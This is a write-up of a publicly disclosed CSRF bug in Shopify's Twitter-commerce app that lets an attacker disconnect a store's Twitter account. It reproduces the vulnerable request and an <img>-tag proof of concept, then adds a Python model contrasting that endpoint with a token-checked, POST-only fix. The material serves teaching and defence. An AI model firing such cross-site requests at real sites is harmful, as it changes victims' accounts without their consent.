Shopify Twitter disconnect

On February 1st, 2016, a researcher named Akhil Reni published a CSRF vulnerability that allows a malicious user to disconnect Shopify's profiles from Twitter.

The vulnerable request that Akhil Reni analyzed is the following:

GET /auth/twitter/disconnect HTTP/1.1
Host: twitter-commerce.shopifyapps.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html, application/xhtml+xml, application/xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://twitter-commerce.shopifyapps.com/account
Cookie: _twitter-commerce_session=bmpuTE5EdnUvYUU0eGxJRk1kMWo5WkI3Wmh1clJkempOTDcya2R3eFNIMG8zWGdpenMvTXY4eFczTWUrNGRQeXV4ZGVycEVtTDZWcFZVbEg1eEtFQjhzSEJVbkM5K05VUVJaeHVtNXBnNTJCNTdwZ2hLL0x0Kyt4eUVlSjRIOWdYTkcwd1NQWWJnbjRNaTF5UXlwa1ZIUlAwR1JmZ1Y5WmRvN2ZHWFY5REZSUmlsR0lnMHZlSjR1OTlTMW5xWDdZRnVGSnBSeEhqbWpNS3lYZmxBNjZoVE00L3pQT2NMd1NONkdwb2pkMXhDS1E2M2RXYlovZjYwaUZnV0JQKzQySlN0MTNKNG55Zlg2azFDdVJJL3RidmJMM0VJNmRVejhZbjVDTnFZNmxFN0k9LS1lY1Y2dnpBZTJCalZzS014SldFUllBPT0%3D--77463ef21e4c8ef530f466db49f78b8e1c2e1129; _ga=GA1.2.469272249.1453024796; _gat=1
Connection: keep-alive

From this request, we can see that the application calls the disconnect method, which is part of the Twitter API. If you try to access this method directly, Twitter returns an error, because a previously established session is required. That session is stored in a cookie, which is sent along with the same request. Akhil Reni used the following proof of concept to exploit the vulnerability:

<html>
<body>
  <img src="https://twitter-commerce.shopifyapps.com/auth/twitter/disconnect">
</body>
</html>

In this snippet of code, you can see one of the most common CSRF exploitation methods: embedding the request in an <img> tag.

This works because every resource a browser fetches from a server, including an image, is requested with GET. If you look at your HTTP proxy, each time an application loads an image it appears as a GET request. So placing the URL in this tag produces a broken image, but the GET request is still sent, together with the user's session cookie, and that is what executes the CSRF attack.
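To make the mechanism concrete, here is an added example (not code from the report or from Shopify) that models the disconnect endpoint twice: once with the behaviour described above, where any request carrying the session cookie performs the state change, and once with a hypothetical fix that requires POST, a same-origin Origin/Referer header and a per-session synchronizer token. The session id, the attacker origin and the handler names are constructed for the example; only the host and cookie name come from the report.

```python
import secrets
from dataclasses import dataclass, field

APP_ORIGIN = "https://twitter-commerce.shopifyapps.com"  # host from the report
SESSION_COOKIE = "_twitter-commerce_session"              # cookie name from the report


@dataclass
class Request:
    method: str
    cookies: dict
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


@dataclass
class Account:
    twitter_connected: bool = True
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


def vulnerable_disconnect(req, sessions):
    """Behaviour described in the report: a valid session cookie is the only
    check, so the GET issued by an <img> tag on another site is enough."""
    acct = sessions.get(req.cookies.get(SESSION_COOKIE))
    if acct is None:
        return 401
    acct.twitter_connected = False
    return 200


def hardened_disconnect(req, sessions):
    """Hypothetical fix (not Shopify's code): POST only, same-origin
    Origin/Referer, and a synchronizer token bound to the session."""
    acct = sessions.get(req.cookies.get(SESSION_COOKIE))
    if acct is None:
        return 401
    if req.method != "POST":
        return 405  # <img>, <a> and plain navigations can only send GET
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if origin != APP_ORIGIN and not origin.startswith(APP_ORIGIN + "/"):
        return 403  # request initiated from another site
    if not secrets.compare_digest(req.form.get("csrf_token", ""), acct.csrf_token):
        return 403  # token missing or not the one issued to this session
    acct.twitter_connected = False
    return 200


def replay(handler):
    """Replays the <img>-style cross-site GET, then a legitimate in-app POST.
    Returns (status of GET, status of POST, still connected after the GET?)."""
    sessions = {"sess-constructed": Account()}  # constructed id, not the real cookie
    cookies = {SESSION_COOKIE: "sess-constructed"}
    csrf_get = Request("GET", cookies, {"Referer": "https://attacker.example/"})
    legit_post = Request("POST", cookies, {"Origin": APP_ORIGIN},
                         {"csrf_token": sessions["sess-constructed"].csrf_token})
    first = handler(csrf_get, sessions)
    still_connected = sessions["sess-constructed"].twitter_connected
    return first, handler(legit_post, sessions), still_connected
```

Against the vulnerable handler the cross-site GET returns 200 and the account is already disconnected; against the hardened handler it is rejected with 405 while the in-app POST still succeeds.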

The tip for finding vulnerabilities like this is to look at how the methods are called in each request and test all of them.

If you want to read more about this bug, visit https://hackerone.com/reports/111216.